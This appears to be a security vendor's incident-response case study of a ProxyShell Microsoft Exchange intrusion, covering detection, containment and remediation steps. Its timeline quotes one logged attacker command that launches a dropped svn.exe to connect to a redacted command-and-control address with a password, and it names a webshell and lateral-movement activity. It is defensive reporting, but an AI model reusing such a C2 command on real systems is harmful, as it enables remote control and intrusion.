Incident Response Timeline – Microsoft Exchange Vulnerability

Microsoft Exchange Vulnerability

Incident Response Timeline TIME From Detection
to Escalation: 20 MINUTES

Join us for our latest real-world attack example which will walk through an attack on a customer in the construction industry with the attacker leveraging the Microsoft Exchange vulnerabilities that were released in early 2021. We’ll show you step by step how the Arctic Wolf team was able to help this customer both stop the immediate attack as well as build a long term fix for these vulnerabilities.

Adversary (Attacker)


Arctic Wolf's Platform


Arctic Wolf Triage Team


Arctic Wolf Customer


Arctic Wolf Concierge Security Team


  • 2021 March

    Microsoft releases out-of-band patch to address multiple critical vulnerabilities within Microsoft Exchange

  • 2021 April

    Microsoft releases security updates for a second set of RCE vulnerabilities within Microsoft Exchange

  • 2021 May - July

    These collections of vulnerabilities are dubbed ProxyShell. Bad actors leverage three separate vulnerabilities as part of a single attack to bypass authentication and execute code

  • 2nd August 2021

    Customer completes onboarding with Arctic Wolf

On Tuesday, 2 March 2021, one week ahead of its typical Patch Tuesday release, Microsoft released an out-of-band patch to address

Vulnerabilities include: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.
vulnerabilities allowed attackers to take full control of a Microsoft Exchange Server exposed to the public internet. Microsoft reported that these vulnerabilities were being actively exploited by HAFNIUM, a threat group they describe as state-sponsored and operating out of China, with attacks dating back to at least 6 January 2021.

View Detailed Attack Timeline

Mon 2 Aug


Sat 7 Aug






Mon 9 Aug




Customer Onboarding Monday, 2 August

[Customer] completes onboarding with Arctic Wolf 5 days prior with Service Delivery kicking off on Monday, 2 August 2021.
  • 1:16pm



Arctic Wolf Agent Saturday, 7 August | 19:27

The Arctic Wolf Agent observes
PowerShell Empire is an incredibly powerful post-exploitation tool. It provides capabilities including privilege escalation, lateral movement, credential theft, and more.
PowerShell enumeration commands on [Exchange Server] begins investigation into [User1] activity.
  • 7:27pm


Arctic Wolf Triage Team:

Investigation Begins Saturday, 7 August | 19:29 - 19:47

The Arctic Wolf Triage Team begins investigation and confirms enumeration commands are suspicious, possible
Used to target enterprise environments, Ryuk ransomware typically encrypts files on an infected system and holds them ransom for cryptocurrency.
Triage Team creates ticket and contacts [customer].
  • 7:29pm


Monitoring CONTINUES:

Arctic Wolf Platform Saturday, 7 August | 19:50

Source: Arctic Wolf Agent

  • SVN.exe is TortoiseSVN, a subversion client that can be used to add, remove, or modify files in a directory.
    SVN.exe dropped to [Exchange Server]
  • PowerShell Command “svn.exe–connect 135.181.x.x:443 –Pass Pasword123”

Log Source: Arctic Wolf Sensor

  • IP 135.181.x.x associated with C2 server in Finland
  • 7:50pm



Arctic Wolf Agent Saturday, 7 August | 20:08

[User1] added to [Exchange Server] local Administrators Group.
Credentials to local [Admin] account were reset.
  • 8:08pm



SentinelOne / Arctic Wolf Agent Saturday, 7 August | 20:09

Attempted lateral movement using [User1] to [Device 1], [Device 2].
[Customer] takes [Exchange Server]
Arctic Wolf Customers can authorize Arctic Wolf to take containment actions on their behalf.
[Customer] satisfied with containment for the moment.
  • 8:08pm



Remediation Monday, 9 August

Arctic Wolf sets up virtual call with [Customer] to step through the remediation process.
  • Remediation

Delete SVN.exe

Delete [User1] account and reset [Admin] account

Reset credentials for any cached users on [Exchange Server]

Reset any domain credentials that accessed the server after Saturday, August 7th

Implement firewall blocking rules

The Security Journey doesn't stop there...

  • Attack Zone
  • Detection Zone
  • Investigation + Escalation
  • Arctic Wolf Platform
  • Arctic Wolf Agent
  • SentinelOne / Arctic Wolf
  • Remediation

Security journey

with our concierge security team

Although many Managed Detection and Response services would end once the threat was remediated, the
With a complete understanding of your unique IT environment, the Arctic Wolf® Concierge Security® Team (CST) provides your team with coverage, security operations expertise, and strategically tailored security recommendations to continuously improve your overall posture.
Arctic Wolf Concierge Security Team is focused on using this attack to improve the security posture of the customer.

Arctic Wolf CST initiates vulnerability scan on [Exchange Server]. The scan identifies missing critical patches dating back 6+ months, including zero-days.

[Customer] confirms their 3rd party patching tool is malfunctioning.

Arctic Wolf CST delivers script to identify Exchange breaches prior to Arctic Wolf onboarding, and the script identifies Backdoor:ASP/Buonpower.A!dha.

Pre-existing webshell is removed.

MFA for VPN and Office 365 enabled.

GPO to prevent enumeration created.


Microsoft Exchange Vulnerabilities and Patch Guidance

In the example above, an attacker leveraged the Microsoft Exchange Vulnerabilities released in early 2021 on a customer in the construction industry.

Detailed guidance and links to available patches have been provided by Microsoft here.

Note:  Please pay careful attention to the patch instructions as there are known issues when applying the patch manually documented by Microsoft on the page.

Arctic Wolf Helps Customers Manage Vulnerabilities

At Arctic Wolf, we help our customers develop workflows to ensure that critical risks are assigned to the right individuals within the department to identify, prioritize, and patch as quickly as possible. We keep track of known vulnerabilities you have been unable to patch and, with Arctic Wolf® Managed Detection and Response, monitor those systems for IOCs. Our Concierge Security Team works proactively to improve security posture overall within our customer, so that if a major vulnerability does hit the damage is better contained.


Contact us to learn more!


Microsoft Exchange Vulnerability Exploitation in the News…

View the most recent news, updates, and videos from the cybersecurity experts at Arctic Wolf.

Recent Headlines